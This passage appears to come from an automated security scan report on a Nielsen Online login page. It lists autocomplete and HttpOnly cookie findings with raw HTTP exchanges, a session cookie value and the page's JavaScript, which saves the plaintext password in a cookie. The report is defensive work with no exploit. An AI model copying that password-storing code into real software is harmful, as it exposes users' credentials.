Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">NetView</span></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=6">@Plan</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="292" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff"> <tr> <td valign="top" align="center"> <form name="usernamePasswordLoginForm" method="post" action="/josso/signon/usernamePasswordLogin.do"> <table border="0" cellspacing="0" cellpadding="0" width="292" > <tr> <td valign="top"> <form method="post" action="" id="login" name="login"> <table border="0" cellpadding="0" cellspacing="0" width="292px" align="left"> <!-- login form start --> <tr> <td align="left" valign="left"> <SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> </td> </tr> <tr> <td height="16px" align="left" valign="left" style="color:red;"> <div id="error" class="errorDiv"> </div> </td> </tr> <tr> <td valign="left"> <table align="left" border="0" width="292" cellpadding="0" cellspacing="0"> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="input_username" name="input_username" onFocus="if(this.value=='Username'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type="text" value="Username"> <input type="hidden" name="josso_cmd" value="login"> <input type="hidden" name="josso_username" value=""> <input type="hidden" name="product_id" value="7"/> </td> </tr> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="josso_password" name="josso_password" onFocus="if(this.value=='password'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type=password value="password"/></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td align="left" valign="center"> <div> <input id="input_remember" type="checkbox">&nbsp; <span class="text">remember me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input value="Submit" class="btnActive" type="button" onclick="javascript:doSubmit();" onMouseOver> </div> </td> </tr> </table></td> </tr> <!-- login form end --> </table> </form> </td> </table> <!--Gray border table end--> </td> </tr> </table> </form><script>var josso_product_id = '7';var josso_cookie_name = 'ntrt_josso_user';var josso_cookie_pass = 'ntrt_josso_pass';var josso_delimiter = ':';function check_onkeypress(element,e){ var whichCode = (window.Event) ? e.which : window.event.keyCode; if (whichCode == 13) doSubmit();} function doSubmit(){ var uname = document.getElementById('input_username').value.replace(' ', ''); if (!uname || !document.usernamePasswordLoginForm.josso_password.value) { document.getElementById("error").innerHTML = 'You need to enter your login and password.'; return false; } //alert("josso_product_id ===="+josso_product_id); //alert("UName ===="+uname); //alert("Pwd ===="+document.usernamePasswordLoginForm.josso_password.value); document.usernamePasswordLoginForm.josso_username.value = uname + josso_delimiter + josso_product_id; var hasRemember = document.getElementById('input_remember').checked; setCookie(josso_cookie_name, uname, hasRemember); setCookie(josso_cookie_pass, document.usernamePasswordLoginForm.josso_password.value, hasRemember); document.usernamePasswordLoginForm.submit();}function getCookie(name){ var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i=0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null;}function setCookie(name, value, doSet){ var date = new Date(); date.setTime(date.getTime()+(1000*24*60*60*1000)); document.cookie = name + '=' + (doSet ? value : '') + '; path=/ ; expires=' + (doSet ? date.toGMTString() : 'Thu, 01-Jan-70 00:00:01 GMT') + ';';}function recallCookie(){ var uname = document.usernamePasswordLoginForm.josso_username.value; var usave = getCookie(josso_cookie_name); uname = (uname ? uname.split(josso_delimiter)[0] : usave); document.getElementById('input_remember').checked = (usave ? true : false);// document.getElementById('login_message').style.visibility = (josso_product_id == '6' ? 'visible' : 'hidden'); if (uname) { document.getElementById('input_username').value = uname; var pass = getCookie(josso_cookie_pass); if (pass) document.usernamePasswordLoginForm.josso_password.value = pass; document.usernamePasswordLoginForm.josso_password.focus(); } else { document.getElementById('input_username').focus(); }}function pageOnLoad(){ //document.getElementById('loginPageImg').style.visibility='visible'; recallCookie();}</script> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td ><div cl..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /josso/signon/

/josso/signon/ CONFIRMED

http://ssoprod.netratings.com/josso/signon/?product_id=7

Identified Field Name

josso_password

Request

GET /josso/signon/?product_id=7 HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=iso-8859-1
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">NetView</span></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=6">@Plan</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="292" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff"> <tr> <td valign="top" align="center"> <form name="usernamePasswordLoginForm" method="post" action="/josso/signon/usernamePasswordLogin.do"> <table border="0" cellspacing="0" cellpadding="0" width="292" > <tr> <td valign="top"> <form method="post" action="" id="login" name="login"> <table border="0" cellpadding="0" cellspacing="0" width="292px" align="left"> <!-- login form start --> <tr> <td align="left" valign="left"> <SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> </td> </tr> <tr> <td height="16px" align="left" valign="left" style="color:red;"> <div id="error" class="errorDiv"> </div> </td> </tr> <tr> <td valign="left"> <table align="left" border="0" width="292" cellpadding="0" cellspacing="0"> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="input_username" name="input_username" onFocus="if(this.value=='Username'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type="text" value="Username"> <input type="hidden" name="josso_cmd" value="login"> <input type="hidden" name="josso_username" value=""> <input type="hidden" name="product_id" value="7"/> </td> </tr> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="josso_password" name="josso_password" onFocus="if(this.value=='password'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type=password value="password"/></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td align="left" valign="center"> <div> <input id="input_remember" type="checkbox">&nbsp; <span class="text">remember me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input value="Submit" class="btnActive" type="button" onclick="javascript:doSubmit();" onMouseOver> </div> </td> </tr> </table></td> </tr> <!-- login form end --> </table> </form> </td> </table> <!--Gray border table end--> </td> </tr> </table> </form><script>var josso_product_id = '7';var josso_cookie_name = 'ntrt_josso_user';var josso_cookie_pass = 'ntrt_josso_pass';var josso_delimiter = ':';function check_onkeypress(element,e){ var whichCode = (window.Event) ? e.which : window.event.keyCode; if (whichCode == 13) doSubmit();} function doSubmit(){ var uname = document.getElementById('input_username').value.replace(' ', ''); if (!uname || !document.usernamePasswordLoginForm.josso_password.value) { document.getElementById("error").innerHTML = 'You need to enter your login and password.'; return false; } //alert("josso_product_id ===="+josso_product_id); //alert("UName ===="+uname); //alert("Pwd ===="+document.usernamePasswordLoginForm.josso_password.value); document.usernamePasswordLoginForm.josso_username.value = uname + josso_delimiter + josso_product_id; var hasRemember = document.getElementById('input_remember').checked; setCookie(josso_cookie_name, uname, hasRemember); setCookie(josso_cookie_pass, document.usernamePasswordLoginForm.josso_password.value, hasRemember); document.usernamePasswordLoginForm.submit();}function getCookie(name){ var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i=0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null;}function setCookie(name, value, doSet){ var date = new Date(); date.setTime(date.getTime()+(1000*24*60*60*1000)); document.cookie = name + '=' + (doSet ? value : '') + '; path=/ ; expires=' + (doSet ? date.toGMTString() : 'Thu, 01-Jan-70 00:00:01 GMT') + ';';}function recallCookie(){ var uname = document.usernamePasswordLoginForm.josso_username.value; var usave = getCookie(josso_cookie_name); uname = (uname ? uname.split(josso_delimiter)[0] : usave); document.getElementById('input_remember').checked = (usave ? true : false);// document.getElementById('login_message').style.visibility = (josso_product_id == '6' ? 'visible' : 'hidden'); if (uname) { document.getElementById('input_username').value = uname; var pass = getCookie(josso_cookie_pass); if (pass) document.usernamePasswordLoginForm.josso_password.value = pass; document.usernamePasswordLoginForm.josso_password.focus(); } else { document.getElementById('input_username').focus(); }}function pageOnLoad(){ //document.getElementById('loginPageImg').style.visibility='visible'; recallCookie();}</script> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td ><div cl..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /josso/signon/

/josso/signon/ CONFIRMED

http://ssoprod.netratings.com/josso/signon/?product_id=6

Identified Cookie

JSESSIONID

Request

GET /josso/signon/?product_id=6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:27 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01; Path=/
Content-Type: text/html;charset=iso-8859-1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=7">NetView</a></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">@Plan</span></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="292" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff"> <tr> <td valign="top" align="center"> <form name="usernamePasswordLoginForm" method="post" action="/josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01"> <table border="0" cellspacing="0" cellpadding="0" width="292" > <tr> 